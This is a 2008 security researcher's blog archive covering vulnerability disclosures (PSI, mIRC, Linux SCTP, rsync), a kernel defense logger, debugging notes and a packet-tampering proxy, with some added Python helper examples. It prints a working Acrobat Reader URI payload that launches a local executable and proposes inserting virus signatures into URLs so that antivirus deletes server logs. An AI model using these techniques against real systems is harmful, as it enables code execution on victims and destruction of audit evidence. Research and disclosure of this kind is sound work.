Monday, December 29, 2008

PSI remote integer overflow

I once scanned myself from the internet, and port 8010/tcp was detected:
my PSI Jabber file transfer service was exposed to the internet.

Then I fuzzed this service and found a nice DoS.

A signed integer check lets you crash remote PSI clients, and I think it is not possible to overflow the heap, because the destination buffer is reallocated to the same number of bytes that are to be copied.

I reported it to the developers, and then they gave me the OK to publish the advisory:

advisory
exploit

Be aware of the services you are exposing to the internet, and be aware of your client applications (browser, Jabber, MSN, email client ...)

code has bugs ;)

Monday, December 01, 2008

Ksec - my Linux Defense System

Kernel viruses/rootkits are difficult to detect, but admins change the kernel frequently and then the attacker loses the rootkit.

People infect user space, and pre-root attacks also happen in user space, so a system that logs dangerous user-space activity is very useful.

A year ago I coded a defense system that is now public.
It is simple but useful: I hook open, socketcall, execve and unlink. For example, if your "ls" is connecting to the internet you will see:

Dec 1 13:44:51 hostname kernel: ls CONNECT(80.33.158.80:1337 fam:2)

If your ls is opening a file for writing:

Dec 1 13:44:25 pwn3d kernel: ls OPEN(/dev/.shm/.sniff w)

try the Defense System here
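
An added example (not part of Ksec or this post): a small Python parser for log lines in the format shown above, plus a policy check that flags binaries which should not be connecting out and writes into hidden paths under /dev. The log lines, the allowlist and the path rules are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample syslog lines in the layout the post shows for Ksec.
SAMPLE_LOG = """\
Dec 1 13:44:25 pwn3d kernel: ls OPEN(/dev/.shm/.sniff w)
Dec 1 13:44:51 hostname kernel: ls CONNECT(80.33.158.80:1337 fam:2)
Dec 1 13:45:02 hostname kernel: wget CONNECT(10.0.0.5:80 fam:2)
Dec 1 13:45:10 hostname kernel: vi OPEN(/home/user/notes.txt w)
Dec 1 13:45:11 hostname kernel: cron: some unrelated message
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) kernel: "
    r"(?P<comm>\S+) (?P<op>[A-Z]+)\((?P<args>[^)]*)\)$"
)

@dataclass
class KsecEvent:
    timestamp: str
    host: str
    comm: str   # process name as the hook logged it, e.g. "ls"
    op: str     # CONNECT, OPEN, EXEC, UNLINK ...
    args: str   # raw text between the parentheses

def parse_line(line: str) -> Optional[KsecEvent]:
    """Parse one Ksec-style line; return None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return KsecEvent(m["ts"], m["host"], m["comm"], m["op"], m["args"])

# Policy assumptions constructed for this example: which commands are expected
# to talk to the network, and which trees should never be opened for writing.
NETWORK_ALLOWED = {"wget", "curl", "ssh", "apt-get"}
NO_WRITE_PREFIXES = ("/dev/", "/proc/", "/sys/")

def connect_target(ev: KsecEvent) -> Tuple[str, int, int]:
    """Split CONNECT args '80.33.158.80:1337 fam:2' into (ip, port, family)."""
    target, fam = ev.args.split(" fam:")
    ip, port = target.rsplit(":", 1)
    return ip, int(port), int(fam)

def is_suspicious(ev: KsecEvent) -> Optional[str]:
    """Return a reason string if the event violates the policy, else None."""
    if ev.op == "CONNECT":
        ip, port, fam = connect_target(ev)
        if fam == 2 and ev.comm not in NETWORK_ALLOWED:   # fam:2 is AF_INET
            return f"{ev.comm} is not expected to connect (to {ip}:{port})"
    elif ev.op == "OPEN":
        path, _, mode = ev.args.rpartition(" ")
        hidden = any(part.startswith(".") for part in path.split("/") if part)
        if "w" in mode and (path.startswith(NO_WRITE_PREFIXES) or hidden):
            return f"{ev.comm} writes to {path}"
    return None

def scan(log_text: str) -> List[Tuple[KsecEvent, str]]:
    """Return [(event, reason)] for every suspicious line in the log."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reason = is_suspicious(ev)
        if reason:
            findings.append((ev, reason))
    return findings

if __name__ == "__main__":
    for ev, reason in scan(SAMPLE_LOG):
        print(f"{ev.timestamp} {ev.host}: {reason}")
```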

Friday, October 03, 2008

mIRC 6.34 (latest) Remote Overflow

When a PRIVMSG arrives, the vulnerable function is called to copy the nickname to a buffer:



let's see the pseudocode of the call: (dest, bytes to copy, src)



Let's see the vulnerable memory zero fill:



ESI is the "bytes to copy"; we don't take the jump because it is greater than 10, and then ...
the first rep starts to copy 0x00 to [edi++] ecx times (309 times), so we write over other variables and out of the page.

Exploitation vector: the nick; well, you must be the server, because servers don't allow large nicknames (a PRIVMSG with a 315-byte nick -> DoS).

Tuesday, July 15, 2008

gdb seek macros

I have coded some basic but useful gdb macros for searching strings and addresses.

get it here: my .gdbinit

Here is a bzip2-compressed MPEG video: demo

Usage:
with these macros, $base in your gdb is 0x08048000 by default

(gdb) gob --> execute step by step until we land in a 0x0804**** address (or another $base)

(gdb) seek $base "hello" --> seek hello from $base to $base+0xffff
$1 = "found:"
$2 = 0x8048480
$3 = "found:"
$4 = 0x8049480
$5 = "found:"
$6 = 0x804a008
^C

(gdb) seekRef $base 0x8048480 --> seek addresses that point to the 0x8048386 address
--> in this case pointers that point to the "hello" address
$7 = "found"
$8 = 0x80485a0
$9 = "found"
$10 = 0x80495a0
^C

(gdb) seekRef $base 0x80485a0 --> let's
(gdb) seekRef $base 0x80495a0
$11 = "found"
$12 = 0x8048386
$13 = "found"
$14 = 0x8049386
^C


NOTE: the macros can be stopped with ^C; they don't stop at the first occurrence.
TODO: identify sections (for now this can be done manually with (gdb) maint info sect)
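
The seek/seekRef logic done in Python over a constructed memory image, as an added example (not the macros from the .gdbinit): string search over the $base window, pointer search as a byte search for the packed little-endian address, and the seek -> seekRef -> seekRef chain from the session above in one call. The image layout is constructed to mirror the addresses in the session.

```python
import struct
from typing import List

BASE = 0x08048000   # the macros' default $base (start of a non-PIE 32-bit ELF)

def seek(mem: bytes, base: int, needle: bytes, span: int = 0xFFFF) -> List[int]:
    """Every address in [base, base+span) where `needle` occurs. `mem` is the
    memory image that starts at `base`; like the seek macro, all hits are
    returned, not just the first one."""
    window, hits = mem[:span], []
    pos = window.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = window.find(needle, pos + 1)
    return hits

def seek_ref(mem: bytes, base: int, target: int, span: int = 0xFFFF) -> List[int]:
    """Every address in the window holding a 32-bit little-endian pointer equal
    to `target` (the seekRef macro): a pointer search is just a byte search for
    the packed address."""
    return seek(mem, base, struct.pack("<I", target), span)

def reference_chain(mem: bytes, base: int, needle: bytes, depth: int = 2) -> List[List[int]]:
    """seek the string, then repeatedly seekRef the previous level's hits; this
    is the seek -> seekRef -> seekRef sequence of the session done in one call."""
    levels = [seek(mem, base, needle)]
    for _ in range(depth):
        next_level = sorted({a for p in levels[-1] for a in seek_ref(mem, base, p)})
        if not next_level:
            break
        levels.append(next_level)
    return levels

def build_sample_image() -> bytes:
    """Constructed 0x3000-byte image at BASE laid out like the session above:
    "hello" at BASE+0x480 (and a copy one page later), a pointer to it at
    BASE+0x5a0, and a pointer to that pointer at BASE+0x386."""
    img = bytearray(0x3000)
    img[0x480:0x485] = b"hello"
    img[0x1480:0x1485] = b"hello"
    img[0x5a0:0x5a4] = struct.pack("<I", BASE + 0x480)
    img[0x386:0x38a] = struct.pack("<I", BASE + 0x5a0)
    return bytes(img)

if __name__ == "__main__":
    img = build_sample_image()
    for level, addrs in enumerate(reference_chain(img, BASE, b"hello")):
        print(level, [hex(a) for a in addrs])
```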

Wednesday, June 25, 2008

Erasing or Blocking logs remotely

On Monday I dreamt of some new web-hacking techniques; now I only remember one:

If you write an EICAR, LoveLetter or any virus fingerprint in the URL, the antivirus blocks or deletes the log files; or the log file can also be sent to the AV company if you write a suspicious pattern.

ex: http://web.com/index.php?<virus pattern>


What about inserting these patterns in the DB? If you register on a website and submit the pattern into the DB, maybe some DB files will be blocked or deleted by the antivirus.

This can also be a vector to exploit some local AV flaws.

NOTE: only Panda detects EICAR strings that are not at the beginning of the file; other patterns must be used.

Monday, June 16, 2008

Linux remote null pointer dereference (CVE-2007-2876)

The Linux netfilter connection tracking new_state() function has a remotely exploitable vulnerability.

In sctp_new():

newconntrack = new_state(IP_CT_DIR_ORIGINAL, SCTP_CONNTRACK_NONE, sch->type);
if (newconntrack == SCTP_CONNTRACK_MAX) {
pr_debug("nf_conntrack_sctp: invalid new deleting.\n");
return 0;
}

MAX is not allowed; CONNTRACK_NONE shouldn't be allowed either.

conntrack->proto.sctp.state = newconntrack;

The state will be zero.

sctp_packet(), to return the verdict for the packet, takes the state 0:

oldsctpstate = conntrack->proto.sctp.state;
newconntrack = new_state(CTINFO2DIR(ctinfo), oldsctpstate, sch->type);

And then dereferences a null pointer:
nf_ct_refresh_acct(conntrack, ctinfo, skb, *sctp_timeouts[newconntrack]);

because sctp_timeouts[SCTP_CONNTRACK_NONE] is NULL; it has no callback:

static unsigned int * sctp_timeouts[]
= { NULL, /* SCTP_CONNTRACK_NONE */
&nf_ct_sctp_timeout_closed, /* SCTP_CONNTRACK_CLOSED */
&nf_ct_sctp_timeout_cookie_wait, /* SCTP_CONNTRACK_COOKIE_WAIT */
&nf_ct_sctp_timeout_cookie_echoed, /* SCTP_CONNTRACK_COOKIE_ECHOED */
&nf_ct_sctp_timeout_established, /* SCTP_CONNTRACK_ESTABLISHED */
&nf_ct_sctp_timeout_shutdown_sent, /* SCTP_CONNTRACK_SHUTDOWN_SENT */
&nf_ct_sctp_timeout_shutdown_recd, /* SCTP_CONNTRACK_SHUTDOWN_RECD */
&nf_ct_sctp_timeout_shutdown_ack_sent /* SCTP_CONNTRACK_SHUTDOWN_ACK_SENT */
}


To exploit this you have to create:
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)
and set the SCTP_STATUS sockopt to zero.

Because this option is read-only, you will need to construct the raw SCTP packet :)

The victim must have an SCTP service, and the oops probably doesn't crash the system.

Sunday, June 08, 2008

kernel hacking

I have not tried all the kernel debuggers for Linux, but the most decent thing I have found for displaying the structures is ddd connected through tap0 to qemu in -s mode.


1. Download the sources of the kernel to debug

In the kernel we enable the debugging support in .config.
Since we will debug this kernel under qemu, we can have all the debug options enabled, mainly these:

.config
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_BUGVERBOSE=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_STACKOVERFLOW=y
CONFIG_DEBUG_PAGEALLOC=y

we compile with make

2. We need to generate an image.img with dd, format it (e.g. ext2) and create a Linux subsystem in it, e.g. with a Debian debootstrap :)

we mount it:
modprobe loop
mount image.img img/ -o loop

if the loop driver does not load, you surely have it, look for it ;)


3. qemu

We have the disk image image.img, the compressed kernel bzImage and the uncompressed vmlinux
We boot qemu with the disk image and the bzImage

qemu -boot c -kernel linux-2.6.*.*/arch/i386/boot/bzImage -hda ./image.img -append "root=/dev/hda clock=pit" -s

-s is the kernel debug mode on port 1234


4. ddd or gdb

ddd has the advantage that we can draw the structures.

We start ddd with the freshly compiled vmlinux (bzImage does not work)
ddd vmlinux

(gdb) target remote localhost:1234

let's check it:
(gdb) b sys_open
(gdb) c

we try e.g. a simple ls, which will invoke the open syscall

Now with ddd we can display any structure, e.g.:



kernel developer sha0wiki

Friday, May 30, 2008

sha0proxy v1 released

I have implemented new features to my multiprotocol proxy, you can get it from:

sha0proxy.pl



Imagine you want to see and interact with the communication between a client and a server; with sha0proxy you can take control or automate replacements.

For now only TCP is available.

Samples:

1. I want to see the communication

./sha0proxy.pl 445 fileserver 445 view
./smbclient -L 127.0.0.1

I will see the number of the current packet,
>>>>> if the client sends to the server,
<<<<< if the server sends to the client,
and the colorized data:

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 21 ..............A!
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

...

2. I want to interfere with the traffic flow at runtime


./sha0proxy.pl 445 filserver 445 trap
./smbclient -L 127.0.0.1


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

I pressed enter twice; I don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>07a
what>AAAAA\x00

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....


I wrote the value AAAAA\x00 at 0x0a1 and sent the modified packet.
Note that I don't accept \0 or \x0 (you have to put the x and two hex digits).
Note that sha0proxy shows us the second packet again, but with the changes applied.

3. I want to make only one change, quickly :)

/sha0proxy.pl 445 filserver 445 trap 2 07a 'AAAAA\x00'
./smbclient -L 127.0.0.1

Note that I called sha0proxy with 3 extra params: the number of the packet to modify, the offset and the value (please quote strange params with '').


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

I pressed enter twice; I don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

I pressed enter twice; I don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

I pressed enter, but on the command line I programmed changes to the second packet; we can see them at 07a.


4. I want to make many changes or write an exploit

cat > smbHeapBof
#This is not a real exploit
#but could be ;)
#

03 07a AAAAA\x00

#I can separate fields with one space or a tab
#I can put comments
#I can't use \0 or \x0; the only allowed format is hex \x00
^C

/sha0proxy.pl 445 filserver 445 trap smbHeapBof
./smbclient -L 127.0.0.1


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

I pressed enter twice; I don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

I pressed enter twice; I don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....


I pressed enter, but the file programmed changes to the second packet; we can see them at 07a.


5. I want to make an exploit file for sha0proxy, but with no interaction; I don't want to press enter every time.

No problem, use view mode.

/sha0proxy.pl 445 filserver 445 view file
./smbclient -L 127.0.0.1

6. I have the server and the client on my box; I can't use the same port for the server and sha0proxy :/

You must use IP aliasing:

ifconfig eth0:1 up
ifconfig eth0:1 up

Make the server listen on ip1 (eth0) and sha0proxy on ip2; the client attacks ip2.


EOF
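
The change-file format and the dump layout shown above, reimplemented as an added Python example (not sha0proxy's own Perl code): it parses "<packet> <hex offset> <value>" lines with "#" comments, enforces the \xNN-only escape rule, applies the changes to a packet and renders the result in the same dump layout. The sample packet (built from the post's SMB rows) and the change file are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

Changes = Dict[int, List[Tuple[int, bytes]]]   # packet number -> [(offset, value)]
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed change file in the layout the post shows for smbHeapBof.
CHANGE_FILE = """\
#This is not a real exploit
#but could be ;)
#

03 07a AAAAA\\x00
3\t000\t\\x00\\x00\\x00\\x7e
"""

# Constructed packet: the post's first SMB row, zero padding, then its row 070.
SAMPLE_PACKET = (bytes.fromhex("000000beff534d4272000000000801c8")
                 + bytes(0x60)
                 + bytes.fromhex("82f71201020206092a864886f7120102"))

def decode_value(text: str) -> bytes:
    """'AAAAA\\x00' -> b'AAAAA\\x00'. Only \\x followed by exactly two hex digits
    is accepted (the post rejects \\0 and \\x0); any other backslash is an error."""
    out, i = bytearray(), 0
    while i < len(text):
        if text[i] != "\\":
            out.append(ord(text[i]))
            i += 1
            continue
        m = ESCAPE_RE.match(text, i)
        if m is None:
            raise ValueError(f"bad escape {text[i:i + 4]!r}: use \\xNN with two hex digits")
        out.append(int(m.group(1), 16))
        i = m.end()
    return bytes(out)

def parse_changes(text: str) -> Changes:
    """One change per line: '<packet> <hex offset> <value>', fields separated by
    spaces or tabs; '#' lines are comments and blank lines are skipped."""
    changes: Changes = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 2)
        if len(fields) != 3:
            raise ValueError(f"line {lineno}: expected '<packet> <offset> <value>'")
        packet, offset = int(fields[0], 10), int(fields[1], 16)
        changes.setdefault(packet, []).append((offset, decode_value(fields[2])))
    return changes

def apply_changes(packet_no: int, data: bytes, changes: Changes) -> bytes:
    """Return the packet with every change registered for `packet_no` applied.
    A value that would run past the end of the packet is rejected, not truncated."""
    buf = bytearray(data)
    for offset, value in changes.get(packet_no, []):
        if offset + len(value) > len(buf):
            raise ValueError(f"change at 0x{offset:03x} ({len(value)} bytes) "
                             f"exceeds packet length {len(buf)}")
        buf[offset:offset + len(value)] = value
    return bytes(buf)

def hexdump(data: bytes, packet_no: int, client_to_server: bool = True) -> str:
    """Render a packet in the post's layout: direction banner, column header,
    then one '<off>|<hex bytes> <ascii>' row per 16 bytes."""
    arrow = ">" if client_to_server else "<"
    lines = [f"{packet_no}{arrow * 33}",
             "|" + " ".join(f"{i:02x}" for i in range(16)) + " |",
             "---+" + "-" * 48 + "+---"]
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:03x}|{hexpart} {ascii_part}")
    return "\n".join(lines)

if __name__ == "__main__":
    patched = apply_changes(3, SAMPLE_PACKET, parse_changes(CHANGE_FILE))
    print(hexdump(patched, 3, client_to_server=False))
```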

Thursday, April 24, 2008

Interesting "feature" of AcroRead

Acroread 8 is vulnerable to command execution: in the URI tag it is possible to put a local path to the file you want to be executed.
get the exploit
This exploit executes the Windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|
<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>

Conclusion: don't trust any file given to you by unknown people :)

Monday, April 14, 2008

Rsync remote code execution

The rsync service with xattr support is vulnerable to remote code execution in versions between 2.6.9 and 3.0.1:
--- a/util.c
+++ b/util.c
@@ -1329,7 +1329,7 @@ void *_new_array(unsigned long num, unsigned int size, int use_calloc)
  return use_calloc ? calloc(num, size) : malloc(num * size);
 }
 
-void *_realloc_array(void *ptr, unsigned int size, unsigned long num)
+void *_realloc_array(void *ptr, unsigned int size, size_t num)
 {
  if (num >= MALLOC_MAX/size)
   return NULL;
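
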